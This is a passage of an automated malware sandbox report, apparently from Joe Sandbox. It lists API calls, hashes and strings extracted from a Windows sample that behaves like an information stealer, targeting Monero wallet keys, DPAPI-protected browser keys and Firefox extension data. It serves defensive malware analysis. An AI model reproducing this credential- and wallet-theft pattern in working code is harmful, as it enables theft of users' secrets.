                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: c61eec155d13f9c3f32ccf0d3857a3929d05a046bfa487b41f5511b3958022f8
                        • Instruction ID: e2507a5e2588f127d2da88531f4281443dd94bc9b6f34414287f464b9beee870
                        • Opcode Fuzzy Hash: c61eec155d13f9c3f32ccf0d3857a3929d05a046bfa487b41f5511b3958022f8
                        • Instruction Fuzzy Hash: B04125711017CC5EDB218B258D84FFB7BEA9B41314F1444E8E98A86183D2719A46DF24
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 006E6663
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006E6726
                        • ExitProcess.KERNEL32 ref: 006E6755
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 95462508b05d9bb7bea95b213a967fc142dc6b6cb3986e6b4d3e4fb59df6ede8
                        • Instruction ID: 920a859ad89e50f15d812a1e8780c8549b5aa9ff163083a16412b1d29c0350d4
                        • Opcode Fuzzy Hash: 95462508b05d9bb7bea95b213a967fc142dc6b6cb3986e6b4d3e4fb59df6ede8
                        • Instruction Fuzzy Hash: 173149B1D12348AADB95EB91DC82BDEB779AF04300F404198F20966192DF746B49CF6A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006F0E28,00000000,?), ref: 006E882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E8836
                        • wsprintfA.USER32 ref: 006E8850
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 2f8cedc636541ffa06f17bbc752a09942b2b623b2118aa4fe41f40b960ef3702
                        • Instruction ID: 77eb27bc5a32e75a170e41fefa5c47be4035679cf2024e7578d9bd3b0f54ac73
                        • Opcode Fuzzy Hash: 2f8cedc636541ffa06f17bbc752a09942b2b623b2118aa4fe41f40b960ef3702
                        • Instruction Fuzzy Hash: 0C214AB1A55208AFDB00DF98DD49FEEBBB8FB48710F108159F605A7280C779AD01DBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006E951E,00000000), ref: 006E8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E8D62
                        • wsprintfW.USER32 ref: 006E8D78
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: 62ac0158d453ef5d35f8115fe211b36af464bb973204ddc11239c189e603f57f
                        • Instruction ID: 6d54c1b8793d3495684fc4185ef0cf1c4830165d365a8fa55882f12cd1eb58df
                        • Opcode Fuzzy Hash: 62ac0158d453ef5d35f8115fe211b36af464bb973204ddc11239c189e603f57f
                        • Instruction Fuzzy Hash: 3AE08CB0B55208BBDB00DB94DC0AEA977B8EB04702F008194FE0987280DA759E00EB92
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DA2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 006DA3FF
                        • lstrlen.KERNEL32(00000000), ref: 006DA6BC
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 006DA743
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 9f30ae3c919a4c2b462bf4945a4f620563b8e14465bad5c00a140c583062cd45
                        • Instruction ID: 1ca401f86505bb9b4fd92d7ee8ad10ea12906144ff1e899d968d8cb25c5faf94
                        • Opcode Fuzzy Hash: 9f30ae3c919a4c2b462bf4945a4f620563b8e14465bad5c00a140c583062cd45
                        • Instruction Fuzzy Hash: ACE12272D122489ADB44FBE5DC92EEE733AAF14300F51815DF51672092EF307A49CB6A
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DD481
                        • lstrlen.KERNEL32(00000000), ref: 006DD698
                        • lstrlen.KERNEL32(00000000), ref: 006DD6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 006DD72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: a531baa392bdf7dd6284ed278bc4922f37a320ae8523b521140aa6e2411730af
                        • Instruction ID: b6b7c6d9c1bb21b37a0ab8ff6c7ec4a0676aa24c270c4973287dc9ea85d214c9
                        • Opcode Fuzzy Hash: a531baa392bdf7dd6284ed278bc4922f37a320ae8523b521140aa6e2411730af
                        • Instruction Fuzzy Hash: FB9112729122489BDB44FBE5DC92DEE733AAF14300F51816DF50766092EF347A09CB6A
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006E8B60: GetSystemTime.KERNEL32(006F0E1A,00E4A900,006F05AE,?,?,006D13F9,?,0000001A,006F0E1A,00000000,?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006E8B86
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006DD801
                        • lstrlen.KERNEL32(00000000), ref: 006DD99F
                        • lstrlen.KERNEL32(00000000), ref: 006DD9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 006DDA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 2153df76b9ab172316bedf83e28651ea911faa4b1ae203e1715b8e38197818fe
                        • Instruction ID: 85feaf85aa480cdfff13d620e776eb989115f8f540e28d5026755a823ccd5dc0
                        • Opcode Fuzzy Hash: 2153df76b9ab172316bedf83e28651ea911faa4b1ae203e1715b8e38197818fe
                        • Instruction Fuzzy Hash: 438112719222489BDB44FBE5DC92DEE733AAF14300F51452DF507A6092EF347A09CB6A
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006F1580,006F0D92), ref: 006DF54C
                        • lstrlen.KERNEL32(00000000), ref: 006DF56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: bbde2639d12b5fde117d9bd0101102bd11fc48de008a77b75d9458566f03697b
                        • Instruction ID: ed5778896f8bbbcdb0928003e33bade893cf551060c9548e30ba0e27c6fc3b8b
                        • Opcode Fuzzy Hash: bbde2639d12b5fde117d9bd0101102bd11fc48de008a77b75d9458566f03697b
                        • Instruction Fuzzy Hash: 66513375D11248AADB44FBE1DC92DEE733BAF54300F41852CF40667191EE347A09CBA6
                        Strings
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006E718C
                        • sn, xrefs: 006E7111
                        • sn, xrefs: 006E72AE, 006E7179, 006E717C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: sn$sn$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-3579818175
                        • Opcode ID: 90e023a15b967659fed2fb4306a5755408c23b18fff559132053b0121aa2173a
                        • Instruction ID: 3e2c629d7f60126c23665ac3731bf2b008a0cee4d4f76c9fb11675814c95d08b
                        • Opcode Fuzzy Hash: 90e023a15b967659fed2fb4306a5755408c23b18fff559132053b0121aa2173a
                        • Instruction Fuzzy Hash: D7518DB0C053489FDB54EBA1DC85BEEB376AF54304F1480ACE20567282EB746E89CF59
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: bb50a1845723b5cfa0a36c6613615bede3e33bfda278835bf046dbb279a134b9
                        • Instruction ID: 89d5602aa7129f4174c84432070d38af42f4984818aa1a06cf3c9167030c35aa
                        • Opcode Fuzzy Hash: bb50a1845723b5cfa0a36c6613615bede3e33bfda278835bf046dbb279a134b9
                        • Instruction Fuzzy Hash: C0415171D11349ABDF04EFF6C845AFEB776AB44304F008018E5166B351EB75AA06CFA5
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006D99EC
                          • Part of subcall function 006D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 006D9A11
                          • Part of subcall function 006D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 006D9A31
                          • Part of subcall function 006D99C0: ReadFile.KERNEL32(000000FF,?,00000000,006D148F,00000000), ref: 006D9A5A
                          • Part of subcall function 006D99C0: LocalFree.KERNEL32(006D148F), ref: 006D9A90
                          • Part of subcall function 006D99C0: CloseHandle.KERNEL32(000000FF), ref: 006D9A9A
                          • Part of subcall function 006E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006E8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006D9D39
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9AEF
                          • Part of subcall function 006D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,006D4EEE,00000000,?), ref: 006D9B01
                          • Part of subcall function 006D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nm,00000000,00000000), ref: 006D9B2A
                          • Part of subcall function 006D9AC0: LocalFree.KERNEL32(?,?,?,?,006D4EEE,00000000,?), ref: 006D9B3F
                          • Part of subcall function 006D9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 006D9B84
                          • Part of subcall function 006D9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 006D9BA3
                          • Part of subcall function 006D9B60: LocalFree.KERNEL32(?), ref: 006D9BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 3d7537ecc76fcb67d803b90b4a1f96cc9bc06a8159d6edaa3b878ab10b951225
                        • Instruction ID: 817ca88abb27183af434881ca9283342bc7783d6a82b6ef38ab58ff1989edf35
                        • Opcode Fuzzy Hash: 3d7537ecc76fcb67d803b90b4a1f96cc9bc06a8159d6edaa3b878ab10b951225
                        • Instruction Fuzzy Hash: 65313EB6D10209ABCF04DFE4DC85AEFB7BAAF48304F144519E905A7345EB349A04CBA5
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006F05B7), ref: 006E86CA
                        • Process32First.KERNEL32(?,00000128), ref: 006E86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 006E86F3
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • CloseHandle.KERNEL32(?), ref: 006E8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: f3f299f2cc736a14aa76854034281fd3896a792cf7fc4ac7e5ae64edb0e99ce0
                        • Instruction ID: 2d65de37593a3959aec048c761919a70cc196013e48ab68a63c1b5a6ddbc8948
                        • Opcode Fuzzy Hash: f3f299f2cc736a14aa76854034281fd3896a792cf7fc4ac7e5ae64edb0e99ce0
                        • Instruction Fuzzy Hash: 64316B71912358ABDB65DF92CC81FEEB77AEB44700F10419DF10AA21A0EB306E45CFA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006F0E00,00000000,?), ref: 006E79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,006F0E00,00000000,?), ref: 006E79C4
                        • wsprintfA.USER32 ref: 006E79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 668acbd425924366358a90c881f126d263869eec05a3d9551b32451b82f4cc9d
                        • Instruction ID: f0d09040487899952a32fd80c845bcae6c2eb059e1ee54879d0b61f1d7467b95
                        • Opcode Fuzzy Hash: 668acbd425924366358a90c881f126d263869eec05a3d9551b32451b82f4cc9d
                        • Instruction Fuzzy Hash: AA112AB2A19118ABCB14DFCADD45BFEB7F8FB4CB11F10425AF605A2280E2395940D7B1
                        APIs
                        • __getptd.LIBCMT ref: 006EC74E
                          • Part of subcall function 006EBF9F: __amsg_exit.LIBCMT ref: 006EBFAF
                        • __getptd.LIBCMT ref: 006EC765
                        • __amsg_exit.LIBCMT ref: 006EC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 006EC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
